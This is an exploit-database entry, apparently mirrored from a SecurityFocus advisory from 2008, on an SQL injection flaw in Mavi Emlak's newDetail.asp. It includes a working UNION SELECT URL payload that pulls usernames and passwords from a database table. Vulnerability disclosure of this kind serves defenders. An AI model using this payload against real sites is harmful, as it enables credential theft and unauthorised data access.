Mavi Emlak - 'newDetail.asp' SQL Injection
| EKU-ID: 37584 | CVE: | OSVDB-ID: |
| Author: Sina Yazdanmehr | Published: 2008-12-29 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 37584 | CVE: | OSVDB-ID: |
| Author: Sina Yazdanmehr | Published: 2008-12-29 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/33041/info Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar